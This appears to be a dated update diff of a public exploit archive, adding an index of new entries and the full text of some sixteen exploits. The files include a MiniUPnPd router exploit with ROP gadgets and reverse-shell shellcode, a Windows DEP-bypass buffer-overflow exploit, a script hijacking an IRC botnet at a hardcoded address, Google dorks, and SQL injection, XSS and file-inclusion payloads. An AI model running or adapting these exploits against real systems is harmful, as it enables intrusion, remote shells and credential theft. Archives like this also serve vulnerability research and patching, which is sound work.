DB: 2015-04-28

16 new exploits

files.csv

@@ -13090,6 +13090,7 @@ id,file,description,date,author,platform,type,port
 15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - SEH Exploit",2010-09-15,"sanjeev gupta",windows,local,0
 15014,platforms/php/webapps/15014.txt,"pixelpost 1.7.3 - Multiple Vulnerabilities",2010-09-15,Sweet,php,webapps,0
 15016,platforms/windows/remote/15016.rb,"Integard Pro 2.2.0.9026 - (Win7 ROP-Code Metasploit Module)",2010-09-15,Node,windows,remote,0
+36828,platforms/java/webapps/36828.txt,"JaWiki 'versionNo' Parameter Cross Site Scripting Vulnerability",2012-02-17,sonyy,java,webapps,0
 15017,platforms/windows/dos/15017.py,"Chalk Creek Media Player 1.0.7 - (.mp3 / .wma) Denial of Service Vulnerability",2010-09-16,"Carlos Mario Penagos Hollmann",windows,dos,0
 15018,platforms/asp/webapps/15018.txt,"mojoportal - Multiple Vulnerabilities",2010-09-16,Abysssec,asp,webapps,0
 15019,platforms/windows/dos/15019.txt,"Microsoft Excel - HFPicture Record Parsing Remote Code Execution Vulnerability",2010-09-16,Abysssec,windows,dos,0
@@ -15958,7 +15959,7 @@ id,file,description,date,author,platform,type,port
 18413,platforms/php/webapps/18413.txt,"SpamTitan Application 5.08x - SQL Injection Vulnerability",2012-01-23,Vulnerability-Lab,php,webapps,0
 18701,platforms/php/webapps/18701.txt,"phpPaleo - Local File Inclusion",2012-04-04,"Mark Stanislav",php,webapps,0
 18416,platforms/jsp/webapps/18416.txt,"stoneware webnetwork6 - Multiple Vulnerabilities",2012-01-24,"Jacob Holcomb",jsp,webapps,0
-18417,platforms/php/webapps/18417.txt,"wordpress <= 3.3.1 - Multiple Vulnerabilities",2012-01-25,"Trustwave's SpiderLabs",php,webapps,0
+18417,platforms/php/webapps/18417.txt,"Wordpress <= 3.3.1 - Multiple Vulnerabilities",2012-01-25,"Trustwave's SpiderLabs",php,webapps,0
 18418,platforms/php/webapps/18418.html,"VR GPub 4.0 - CSRF Vulnerability",2012-01-26,Cyber-Crystal,php,webapps,0
 18419,platforms/php/webapps/18419.html,"phplist 2.10.9 - CSRF/XSS Vulnerability",2012-01-26,Cyber-Crystal,php,webapps,0
 18420,platforms/windows/remote/18420.rb,"Sysax Multi Server 5.50 - Create Folder Remote Code Execution BoF (MSF Module)",2012-01-26,"Craig Freyman",windows,remote,0
@@ -33206,7 +33207,7 @@ id,file,description,date,author,platform,type,port
 36800,platforms/php/webapps/36800.txt,"Wordpress NEX-Forms < 3.0 - SQL Injection Vulnerability",2015-04-21,"Claudio Viviani",php,webapps,0
 36801,platforms/php/webapps/36801.txt,"WordPress MiwoFTP Plugin <= 1.0.5 - Arbitrary File Download",2015-04-21,"dadou dz",php,webapps,0
 36802,platforms/php/webapps/36802.txt,"WordPress Tune Library Plugin 1.5.4 - SQL Injection Vulnerability",2015-04-21,"Hannes Trunde",php,webapps,0
-36803,platforms/windows/remote/36803.py,"ProFTPd 1.3.5 - Remote Command Execution",2015-04-21,R-73eN,windows,remote,0
+36803,platforms/windows/remote/36803.py,"ProFTPd 1.3.5 (mod_copy) - Remote Command Execution",2015-04-21,R-73eN,windows,remote,0
 36804,platforms/php/webapps/36804.pl,"MediaSuite CMS - Artibary File Disclosure Exploit",2015-04-21,"KnocKout inj3ct0r",php,webapps,0
 36805,platforms/php/webapps/36805.txt,"WordPress Community Events Plugin 1.3.5 - SQL Injection Vulnerability",2015-04-21,"Hannes Trunde",php,webapps,0
 36808,platforms/windows/remote/36808.rb,"Adobe Flash Player copyPixelsToByteArray Integer Overflow",2015-04-21,metasploit,windows,remote,0
@@ -33222,5 +33223,20 @@ id,file,description,date,author,platform,type,port
 36820,platforms/linux/local/36820.txt,"Ubuntu usb-creator 0.2.x - Local Privilege Escalation",2015-04-23,"Tavis Ormandy",linux,local,0
 36821,platforms/php/webapps/36821.txt,"WebUI 1.5b6 - Remote Code Execution Vulnerability",2015-04-23,"TUNISIAN CYBER",php,webapps,0
 36822,platforms/windows/local/36822.pl,"Quick Search 1.1.0.189 - 'search textbox' Unicode SEH egghunter Buffer Overflow",2015-04-23,"Tomislav Paskalev",windows,local,0
+36823,platforms/php/webapps/36823.txt,"Ultimate Product Catalogue Wordpress Plugin - Unauthenticated SQLi",2015-04-23,"Felipe Molina",php,webapps,0
+36824,platforms/php/webapps/36824.txt,"Ultimate Product Catalogue Wordpress Plugin - Unauthenticated SQLi #2",2015-04-23,"Felipe Molina",php,webapps,0
 36825,platforms/hardware/dos/36825.php,"ZYXEL P-660HN-T1H_IPv6 Remote Configuration Editor / Web Server DoS",2015-04-23,"Koorosh Ghorbani",hardware,dos,80
 36826,platforms/windows/local/36826.pl,"Free MP3 CD Ripper 2.6 2.8 (.wav) - SEH Based Buffer Overflow",2015-04-23,ThreatActor,windows,local,0
+36827,platforms/windows/local/36827.py,"Free MP3 CD Ripper 2.6 2.8 (.wav) - SEH Based Buffer Overflow (W7 - DEP Bypass)",2015-04-24,naxxo,windows,local,0
+36829,platforms/windows/remote/36829.txt,"R2/Extreme 1.65 - Stack Based Buffer Overflow and Directory Traversal Vulnerabilities",2012-02-17,"Luigi Auriemma",windows,remote,0
+36830,platforms/php/webapps/36830.txt,"Impulsio CMS 'id' Parameter SQL Injection Vulnerability",2012-02-16,sonyy,php,webapps,0
+36831,platforms/hardware/remote/36831.txt,"Endian Firewall 2.4 openvpn_users.cgi PATH_INFO XSS",2012-02-27,"Vulnerability Research Laboratory",hardware,remote,0
+36832,platforms/hardware/remote/36832.txt,"Endian Firewall 2.4 dnat.cgi createrule Parameter XSS",2012-02-27,"Vulnerability Research Laboratory",hardware,remote,0
+36833,platforms/hardware/remote/36833.txt,"Endian Firewall 2.4 dansguardian.cgi addrule Parameter XSS",2012-02-27,"Vulnerability Research Laboratory",hardware,remote,0
+36834,platforms/php/webapps/36834.txt,"Joomla! X-Shop Component 'idd' Parameter SQL Injection Vulnerability",2012-02-18,KedAns-Dz,php,webapps,0
+36835,platforms/php/webapps/36835.txt,"Joomla Xcomp 'com_xcomp' Component Local File Include Vulnerability",2012-02-18,KedAns-Dz,php,webapps,0
+36836,platforms/multiple/remote/36836.py,"Legend Perl IRC Bot - Remote Code Execution PoC",2015-04-27,"Jay Turla",multiple,remote,0
+36844,platforms/php/webapps/36844.txt,"WordPress <= 4.2 - Stored XSS",2015-04-27,klikki,php,webapps,0
+36839,platforms/multiple/remote/36839.py,"MiniUPnPd 1.0 - Stack Overflow RCE for AirTies RT Series (MIPS)",2015-04-27,"Onur Alanbel (BGA)",multiple,remote,0
+36841,platforms/windows/local/36841.py,"UniPDF Version 1.2 - 'xml' Buffer Overflow Crash PoC",2015-04-27,"Avinash Thapa",windows,local,0
+36842,platforms/php/webapps/36842.pl,"OTRS < 3.1.x & < 3.2.x & < 3.3.x - Stored Cross-Site Scripting (XSS)",2015-04-27,"Adam Ziaja",php,webapps,0

platforms/hardware/remote/36831.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/52076/info
+
+Endian Firewall is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible. 
+
+https://www.example.com/cgi-bin/openvpn_users.cgi?=[XSS] 

platforms/hardware/remote/36832.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/52076/info
+ 
+Endian Firewall is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+ 
+Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible.
+ 
+https://www.example.com/cgi-bin/dnat.cgi#createrule[XSS] 

platforms/hardware/remote/36833.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/52076/info
+  
+Endian Firewall is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+  
+Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible.
+  
+https://www.example.com/cgi-bin/dansguardian.cgi#addrule[XSS] 

platforms/java/webapps/36828.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/52060/info
+
+JaWiki is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/jawiki/user/main/homepage?action=showVersion&versionNo=%3Cscript%3Ealert%28%22123%20xss%22%29%3C/script%3E 

platforms/multiple/remote/36836.py

@@ -0,0 +1,50 @@
+#
+# legend_rce.py
+# Legend Perl IRC Bot Remote Code Execution PoC
+# author: Jay Turla ( @shipcod3 )
+# description: This is a RCE PoC for Legend Bot which has been used in the Shellshock spam October 2014. 
+# reference: http://www.csoonline.com/article/2839054/vulnerabilities/report-criminals-use-shellshock-against-mail-servers-to-build-botnet.html
+# greetz to ROOTCON (rootcon.org) goons
+#
+
+import socket
+import sys
+
+def usage():
+     print("USAGE: python legend_rce.py nick")
+     print("Sample nicks found in the wild: god, ARZ, Zax, HackTech, TheChozen")
+     
+def main(argv):
+    
+    if len(argv) < 2:
+        return usage()
+
+    #irc server connection settings
+    botnick = sys.argv[1] #admin payload for taking over the Legend Bot
+    server = "80.246.50.71" #irc server
+    channel = "#Apache" #channel where the bot is located
+
+    irc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #defines the socket
+    print "connecting to:"+server
+    irc.connect((server, 2015)) #connects to the server, you can change the port by changing 2015 for example :)
+    irc.send("USER "+ botnick +" "+ botnick +" "+ botnick +" :legend.rocks\n") #user authentication
+    irc.send("NICK "+ botnick +"\n") #sets nick
+    irc.send("JOIN "+ channel +"\n") #join the chan
+    irc.send("PRIVMSG "+channel+" :!legend @system 'uname -a' \n") #send the payload to the bot
+
+    while 1:    #puts it in a loop
+        text=irc.recv(2040)  #receive the text
+        print text   #print text to console
+
+        if text.find('PING') != -1:                          #check if 'PING' is found
+            irc.send('PONG ' + text.split() [1] + '\r\n') #returns 'PONG' back to the server (prevents pinging out!)
+        if text.find('!quit') != -1: #quit the Bot
+            irc.send ("QUIT\r\n") 
+            sys.exit()
+        if text.find('Linux') != -1:                         
+            irc.send("PRIVMSG "+channel+" :The bot answers to "+botnick+" which allows command execution \r\n")
+            irc.send ("QUIT\r\n")
+            sys.exit()
+
+if __name__ == "__main__":
+    main(sys.argv)

platforms/multiple/remote/36839.py

@@ -0,0 +1,142 @@
+#!/usr/bin/env python
+
+# Exploit Title: MiniUPnPd 1.0 Stack Overflow RCE for AirTies RT Series
+# Date: 26.04.2015
+# Exploit Author: Onur ALANBEL (BGA)
+# Vendor Homepage: http://miniupnp.free.fr/
+# Version: 1.0
+# Architecture: MIPS
+# Tested on: AirTies RT-204v3
+# CVE : 2013-0230
+# Exploit gives a reverse shell to lhost:lport
+# Details: https://www.exploit-db.com/docs/36806.pdf
+
+import urllib2
+from string import join
+from argparse import ArgumentParser
+from struct import pack
+from socket import inet_aton
+
+BYTES = 4
+
+
+def hex2str(value, size=BYTES):
+    data = ""
+
+    for i in range(0, size):
+        data += chr((value >> (8*i)) & 0xFF)
+
+    data = data[::-1]
+
+    return data
+
+
+arg_parser = ArgumentParser(prog="miniupnpd_mips.py", description="MiniUPnPd \
+                            CVE-2013-0230 Reverse Shell exploit for AirTies \
+                            RT Series, start netcat on lhost:lport")
+arg_parser.add_argument("--target", required=True, help="Target IP address")
+arg_parser.add_argument("--lhost", required=True, help="The IP address\
+                        which nc is listening")
+arg_parser.add_argument("--lport", required=True, type=int, help="The\
+                        port which nc is listening")
+
+args = arg_parser.parse_args()
+
+libc_base = 0x2aabd000
+ra_1 = hex2str(libc_base + 0x36860)     # ra = 1. gadget
+s1 = hex2str(libc_base + 0x1636C)       # s1 = 2. gadget
+sleep = hex2str(libc_base + 0x35620)    # sleep function
+ra_2 = hex2str(libc_base + 0x28D3C)     # ra = 3. gadget
+s6 = hex2str(libc_base + 0x1B19C)       # ra = 4.gadget
+s2 = s6
+lport = pack('>H', args.lport)
+lhost = inet_aton(args.lhost)
+
+shellcode = join([
+    "\x24\x11\xff\xff"
+    "\x24\x04\x27\x0f"
+    "\x24\x02\x10\x46"
+    "\x01\x01\x01\x0c"
+    "\x1e\x20\xff\xfc"
+    "\x24\x11\x10\x2d"
+    "\x24\x02\x0f\xa2"
+    "\x01\x01\x01\x0c"
+    "\x1c\x40\xff\xf8"
+    "\x24\x0f\xff\xfa"
+    "\x01\xe0\x78\x27"
+    "\x21\xe4\xff\xfd"
+    "\x21\xe5\xff\xfd"
+    "\x28\x06\xff\xff"
+    "\x24\x02\x10\x57"
+    "\x01\x01\x01\x0c"
+    "\xaf\xa2\xff\xff"
+    "\x8f\xa4\xff\xff"
+    "\x34\x0f\xff\xfd"
+    "\x01\xe0\x78\x27"
+    "\xaf\xaf\xff\xe0"
+    "\x3c\x0e" + lport +
+    "\x35\xce" + lport +
+    "\xaf\xae\xff\xe4"
+    "\x3c\x0e" + lhost[:2] +
+    "\x35\xce" + lhost[2:4] +
+    "\xaf\xae\xff\xe6"
+    "\x27\xa5\xff\xe2"
+    "\x24\x0c\xff\xef"
+    "\x01\x80\x30\x27"
+    "\x24\x02\x10\x4a"
+    "\x01\x01\x01\x0c"
+    "\x24\x0f\xff\xfd"
+    "\x01\xe0\x78\x27"
+    "\x8f\xa4\xff\xff"
+    "\x01\xe0\x28\x21"
+    "\x24\x02\x0f\xdf"
+    "\x01\x01\x01\x0c"
+    "\x24\x10\xff\xff"
+    "\x21\xef\xff\xff"
+    "\x15\xf0\xff\xfa"
+    "\x28\x06\xff\xff"
+    "\x3c\x0f\x2f\x2f"
+    "\x35\xef\x62\x69"
+    "\xaf\xaf\xff\xec"
+    "\x3c\x0e\x6e\x2f"
+    "\x35\xce\x73\x68"
+    "\xaf\xae\xff\xf0"
+    "\xaf\xa0\xff\xf4"
+    "\x27\xa4\xff\xec"
+    "\xaf\xa4\xff\xf8"
+    "\xaf\xa0\xff\xfc"
+    "\x27\xa5\xff\xf8"
+    "\x24\x02\x0f\xab"
+    "\x01\x01\x01\x0c"
+    ], '')
+
+payload = 'C'*2052 + s1 + 'C'*(4*4) + s6 + ra_1 + 'C'*28 + sleep + 'C'*40 + s2\
+    + ra_2 + 'C'*32 + shellcode
+
+
+soap_headers = {
+    'SOAPAction': "n:schemas-upnp-org:service:WANIPConnection:1#" + payload,
+}
+
+soap_data = """
+    <?xml version='1.0' encoding="UTF-8"?>
+    <SOAP-ENV:Envelope
+    SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
+    xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
+    xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
+    >
+    <SOAP-ENV:Body>
+    <ns1:action xmlns:ns1="urn:schemas-upnp-org:service:WANIPConnection:1"\
+        SOAP-ENC:root="1">
+    </ns1:action>
+    </SOAP-ENV:Body>
+    </SOAP-ENV:Envelope>
+    """
+
+try:
+    print "Exploiting..."
+    req = urllib2.Request("http://" + args.target + ":5555", soap_data,
+                          soap_headers)
+    res = urllib2.urlopen(req).read()
+except:
+    print "Ok"

platforms/php/webapps/36823.txt

@@ -0,0 +1,51 @@
+# Exploit Title: Unauthenticated SQLi in Item_ID POST parameter on Ultimate
+Product Catalogue wordpress plugin
+# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue"
+intext:"Category",
+inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
+# Date: 22/04/2015
+# Exploit Author: Felipe Molina de la Torre (@felmoltor)
+# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
+# Software Link:
+https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
+# Version: < 3.1.2, Comunicated and Fixed by the Vendor in 3.1.3
+# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache
+2.4.0 (Ubuntu)
+# CVE : Requested to mitre but not assigned yet
+# Category: webapps
+
+1. Summary:
+
+    Ultimate Product Catalogue is a responsive and easily customizable
+plugin for all your product catalogue needs. It has +59.000 downloads,
++3.000 active installations.
+
+    Unauthenticated SQL injection in ajax call when the plugin is counting
+the times a product is being seen by the web visitors. The vulnerable POST
+parameter is "Item_ID".
+
+2. Vulnerability timeline:
+- 22/04/2015: Identified in version 3.1.2
+- 22/04/2015: Comunicated to developer company etoilewebdesign.com
+- 22/04/2015: Response from etoilewebdesign.com and fixed version in 3.1.3
+3. Vulnerable code:
+
+    In file Functions/Process_Ajax.php line 67:
+ [...]
+$Item_ID = $_POST['Item_ID'];
+        $Item = $wpdb->get_row("SELECT Item_Views FROM $items_table_name
+WHERE Item_ID=" . $Item_ID);
+[...]
+
+3. Proof of concept:
+
+    POST /wp-admin/admin-ajax.php HTTP/1.1
+  Host: <wordpress host>
+  [...]
+  Cookie: wordpress_f305[...]
+
+  Item_ID=2 AND SLEEP(5)&action=record_view
+
+4. Solution:
+
+    Update to version 3.1.3

platforms/php/webapps/36824.txt

@@ -0,0 +1,41 @@
+# Exploit Title: Unauthenticated SQLi on Ultimate Product Catalogue
+wordpress plugin
+# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue"
+intext:"Category",
+inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
+# Date: 22/04/2015
+# Exploit Author: Felipe Molina de la Torre (@felmoltor)
+# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
+# Software Link:
+https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
+# Version: < 3.1.2, Comunicated and Fixed by the Vendor in 3.1.3
+# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turnedd off, Apache
+2.4.0 (Ubuntu)
+# CVE : Requested to mitre but not assigned yet
+# Category: webapps
+
+1. Summary:
+
+     Ultimate Product Catalogue is A responsive and easily customizable
+plugin for all your product catalogue needs. It has +59.000 downloads,
++3.000 active installations.
+
+ Unauthenticated SQL injection in parameter "SingleProduct" when a web
+visitor explores a product published by the web administrator
+
+2. Vulnerability timeline:
+- 22/04/2015: Identified in version 3.1.2
+- 22/04/2015: Comunicated to developer company etoilewebdesign.com
+- 22/04/2015: Response from etoilewebdesign.com and fixed version in 3.1.3
+3. Vulnerable code:
+
+    File Functions/Shortcodes.php line 779
+
+3. Proof of concept
+
+    http://<wordpress site>/?SingleProduct=2'+and+'a'='a
+    http://<wordpress site>/?SingleProduct=2'+and+'a'='b
+
+4. Solution:
+
+    Update to version 3.1.3

platforms/php/webapps/36830.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/52063/info
+
+Impulsio CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?id=[SQL] 

platforms/php/webapps/36834.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/52077/info
+
+The X-Shop component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?option=com_x-shop&action=artdetail&idd=' 

platforms/php/webapps/36835.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/52078/info
+
+The Xcomp component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible. 
+
+http://www.example.com/index.php?option=com_xcomp&controller=../../[LFI]%00 

platforms/php/webapps/36842.pl

@@ -0,0 +1,20 @@
+# Exploit Title: Stored Cross-Site Scripting (XSS) in OTRS
+# Date: 28.01.2014
+# Exploit Author: Adam Ziaja http://adamziaja.com
+# Vendor Homepage: https://www.otrs.com
+# Version: 3.1.x before 3.1.20, 3.2.x before 3.2.15, and 3.3.x before 3.3.5
+# CVE : CVE-2014-1695
+
+#!/usr/bin/perl -w
+use strict;
+use MIME::Lite;
+my $msg = MIME::Lite->new(
+    Subject => 'OTRS XSS PoC',
+    From => 'attacker@example.com',
+    To => 'otrs@example.com',
+    Type => 'text/html',
+    Data =>
+        '<html><body><img/onerror="alert(\'XSS1\')"src=a><iframe
+src=javasc&#x72ipt:alert(\'XSS2\') ></body></html>'
+);
+$msg->send();

platforms/php/webapps/36844.txt

@@ -0,0 +1,49 @@
+Source: http://klikki.fi/adv/wordpress2.html
+
+
+## Overview
+Current versions of WordPress are vulnerable to a stored XSS.  An unauthenticated attacker can inject JavaScript in 
+WordPress comments. The script is triggered when the comment is viewed.
+
+If triggered by a logged-in administrator, under default settings the attacker can leverage the vulnerability to 
+execute arbitrary code on the server via the plugin and theme editors.
+
+Alternatively the attacker could change the administrator’s password, create new administrator accounts, 
+or do whatever else the currently logged-in administrator can do on the target system.
+
+
+
+## Details
+If the comment text is long enough, it will be truncated when inserted in the database. 
+The MySQL TEXT type size limit is 64 kilobytes, so the comment has to be quite long.
+
+The truncation results in malformed HTML generated on the page. 
+The attacker can supply any attributes in the allowed HTML tags, in the same way 
+as with the two recently published stored XSS vulnerabilities affecting the WordPress core.
+
+The vulnerability bears a similarity to the one reported by Cedric Van Bockhaven in 
+2014 (patched this week, after 14 months). Instead of using an invalid character to truncate 
+the comment, this time an excessively long comment is used for the same effect.
+
+In these two cases, the injected JavaScript apparently can't be triggered in the 
+administrative Dashboard so these exploits seem to require getting around comment 
+moderation e.g. by posting one harmless comment first.
+
+The similar vulnerability released by Klikki in November 2014 could be exploited in the 
+administrative Dashboard while the comment is still in the moderation queue. Some 
+exploit attempts of this have been recently reported in the wild.
+
+
+
+## Proof of Concept
+Enter as a comment text:
+
+  <a title='x onmouseover=alert(unescape(/hello%20world/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px  AAAAAAAAAAAA...[64 kb]..AAA'></a>
+
+Confirmed vulnerable: WordPress 4.2, 4.1.2, 4.1.1, 3.9.3. 
+Tested with MySQL versions 5.1.53 and 5.5.41.
+
+
+
+## Demo
+https://www.youtube.com/watch?v=OCqQZJZ1Ie4

platforms/windows/local/36827.py

@@ -0,0 +1,77 @@
+#!/usr/bin/python
+
+# original p0c https://www.exploit-db.com/exploits/36465/
+# credit to TUNISIAN CYBER
+# modified SEH Exploit https://www.exploit-db.com/exploits/36826/
+# credit to ThreatActor at CoreRed.com
+# Software Link: https://www.exploit-db.com/apps/64215b82be8bb2e749f95fec5b51d3e4-FMCRSetup.exe
+
+# Tested on: Windows 7 Ultimate X64
+# Added DEP Bypass to the exploit
+# naxxo (head@gmail.com)
+
+
+import struct
+
+def create_rop_chain():
+
+    # rop chain generated with mona.py - www.corelan.be
+    rop_gadgets = [
+      0x004103fe,  # POP EAX # RETN [fcrip.exe] 
+      0x004e91f4,  # ptr to &VirtualAlloc() [IAT fcrip.exe]
+      0x00418ff8,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [fcrip.exe] 
+      0x00446c97,  # PUSH EAX # POP ESI # POP EBX # RETN [fcrip.exe] 
+      0x41414141,  # Filler (compensate)
+      0x6f4811f8,  # POP EBP # RETN [vorbisfile.dll] 
+      0x1000c5ce,  # & push esp # ret  [libFLAC.dll]
+      0x00415bfb,  # POP EBX # RETN [fcrip.exe] 
+      0x00000001,  # 0x00000001-> ebx
+      0x00415828,  # POP EDX # RETN [fcrip.exe] 
+      0x00001000,  # 0x00001000-> edx
+      0x10005f62,  # POP ECX # RETN [libFLAC.dll] 
+      0x00000040,  # 0x00000040-> ecx
+      0x00409967,  # POP EDI # RETN [fcrip.exe] 
+      0x00412427,  # RETN (ROP NOP) [fcrip.exe]
+      0x00494277,  # POP EAX # RETN [fcrip.exe] 
+      0x90909090,  # nop
+      0x004c8dc0,  # PUSHAD # RETN [fcrip.exe] 
+    ]
+    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
+
+rop_chain = create_rop_chain()
+
+# msfvenom -p windows/exec CMD=calc.exe -f python -b '\x00\xff\x0a\x0d'
+shellcode =  ""
+shellcode += "\xbf\xaa\x7e\xf4\xa0\xd9\xec\xd9\x74\x24\xf4\x5a\x33"
+shellcode += "\xc9\xb1\x31\x83\xc2\x04\x31\x7a\x0f\x03\x7a\xa5\x9c"
+shellcode += "\x01\x5c\x51\xe2\xea\x9d\xa1\x83\x63\x78\x90\x83\x10"
+shellcode += "\x08\x82\x33\x52\x5c\x2e\xbf\x36\x75\xa5\xcd\x9e\x7a"
+shellcode += "\x0e\x7b\xf9\xb5\x8f\xd0\x39\xd7\x13\x2b\x6e\x37\x2a"
+shellcode += "\xe4\x63\x36\x6b\x19\x89\x6a\x24\x55\x3c\x9b\x41\x23"
+shellcode += "\xfd\x10\x19\xa5\x85\xc5\xe9\xc4\xa4\x5b\x62\x9f\x66"
+shellcode += "\x5d\xa7\xab\x2e\x45\xa4\x96\xf9\xfe\x1e\x6c\xf8\xd6"
+shellcode += "\x6f\x8d\x57\x17\x40\x7c\xa9\x5f\x66\x9f\xdc\xa9\x95"
+shellcode += "\x22\xe7\x6d\xe4\xf8\x62\x76\x4e\x8a\xd5\x52\x6f\x5f"
+shellcode += "\x83\x11\x63\x14\xc7\x7e\x67\xab\x04\xf5\x93\x20\xab"
+shellcode += "\xda\x12\x72\x88\xfe\x7f\x20\xb1\xa7\x25\x87\xce\xb8"
+shellcode += "\x86\x78\x6b\xb2\x2a\x6c\x06\x99\x20\x73\x94\xa7\x06"
+shellcode += "\x73\xa6\xa7\x36\x1c\x97\x2c\xd9\x5b\x28\xe7\x9e\x94"
+shellcode += "\x62\xaa\xb6\x3c\x2b\x3e\x8b\x20\xcc\x94\xcf\x5c\x4f"
+shellcode += "\x1d\xaf\x9a\x4f\x54\xaa\xe7\xd7\x84\xc6\x78\xb2\xaa"
+shellcode += "\x75\x78\x97\xc8\x18\xea\x7b\x21\xbf\x8a\x1e\x3d"
+
+
+
+junk = "A" * 3812
+junk+= rop_chain + "\x90" * (308-len(rop_chain)-len(shellcode)) + shellcode
+
+seh  = "\xd8\x2a\x9d\x63" # 0x639d2ad8 : {pivot 1132 / 0x46c} :  # ADD ESP,45C # XOR EAX,EAX # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [vorbis.dll] **   |   {PAGE_EXECUTE_READ}
+ 
+
+buffer = junk + seh + "\x90" * 800
+
+
+file = "poc.wav"
+f=open(file,"w")
+f.write(buffer);
+f.close();

platforms/windows/local/36841.py

@@ -0,0 +1,33 @@
+# Exploit Title: UniPDF v1.2 BufferOverflow, SEH overwrite DoS PoC
+# Author : Avinash Kumar Thapa "-Acid"
+# Date of Testing :  25th April 2015
+# Tested On : Windows XP- Service Pack 3 && Windows 7 Home Basic
+# Vendor Homepage: http://unipdf.com/
+# Software Link: http://unipdf.com/file/unipdf-setup.exe
+# Steps to reproduce the Crash is:
+#   Step 1: Run the POC
+#   Step 2: Go to local Disk C:\Program Files\UniPDF and copy the POC there
+#   Step 3 : Run the UniPdf.exe 
+
+buff2 = "\x41" * 3000
+crash = "      <config>\n"
+crash +=  "         <UserDefine>\n"
+crash  +=               "<Language ID=\"0\" />\n"
+crash +=                "<Path PathSet=\""+buff2+"\" Path=\"\" />\n"
+crash +=                "<ImageFormat set=\"2\" />\n"
+crash +=                "<Res set=\"96\" />\n"
+crash +=                "<bit set=\"24\" />\n"
+crash +=                "<Prefix set=\"\" />\n"
+crash +=                "<Doc set=\"1\" />\n"
+crash +=                "<Help set=\"1\" />\n"
+crash +=             "</UserDefine>\n"
+crash +=        "</config>\n"
+
+print "POC Created By -Acid"
+print " acid.exploit@gmail.com" 
+file = open("update.xml","w")
+file.write(crash)
+file.close()
+
+
+

platforms/windows/remote/36829.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/52061/info
+
+R2/Extreme is prone to a stack-based buffer-overflow vulnerability and a directory-traversal vulnerability.
+
+Exploiting these issues may allow remote attackers to execute arbitrary code or retrieve arbitrary files within the context of the affected application.
+
+R2/Extreme 1.65 is vulnerable; other versions may also be affected. 
+
+https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/36829.zip